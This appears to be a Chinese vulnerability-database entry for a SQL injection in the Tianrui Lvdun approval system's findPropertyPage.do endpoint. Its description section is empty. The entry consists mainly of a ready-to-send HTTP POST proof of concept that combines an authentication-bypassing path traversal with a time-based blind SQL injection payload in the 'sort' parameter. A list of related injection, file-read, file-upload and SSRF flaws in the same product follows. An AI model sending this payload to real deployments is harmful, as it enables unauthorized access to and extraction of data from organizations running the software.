天锐绿盾审批系统 findPropertyPage.do SQL注入漏洞

漏洞描述

PoC代码

POST /trwfe/login.jsp/../invoker/findPropertyPage.do HTTP/1.1
Host: 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Priority: u=0, i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:145.0) Gecko/20100101 Firefox/145.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 87

tenantId=1&categoryId=1&sort=1%20or+(select+1337+from+(select(sleep(5)))test)&order=asc

相关漏洞推荐

• 天锐绿盾审批系统 /trwfe/service/../invoker/findTenantPage.do SQL 注入漏洞
• 天锐绿盾审批系统 /trwfe/login.jsp/.%2e/invoker/findCategoryPage.do SQL 注入漏洞
• 天锐绿盾审批系统 /trwfe/file/downFileByconfirm.do 文件读取漏洞
• 天锐绿盾审批系统 /trwfe/login.jsp/.%2e/file/addUpFile.do 文件上传漏洞
• 天锐绿盾审批系统 file 任意文件读取漏洞
• 天锐绿盾审批系统 downFileByconfirm.do 存在任意文件读取漏洞
• 天锐绿盾审批系统 login.jsp 任意文件上传漏洞
• 天锐绿盾审批系统 /trwfe/user/findUserPage.do 信息泄露漏洞
• 天锐科技 天锐绿盾审批系统 checkDbAvailalbe.do 服务器端请求伪造(SSRF)漏洞
• POC 天锐绿盾审批系统 exportReady.do 未授权访问漏洞
• 天锐绿盾审批系统 /trwfe/login.jsp/.%2e/role/findRolePage.do SQL 注入漏洞
• 天锐绿盾审批系统 findRolePage.do SQL注入漏洞
• POC 天锐绿盾审批系统 downFileByconfirm.do 任意文件读取漏洞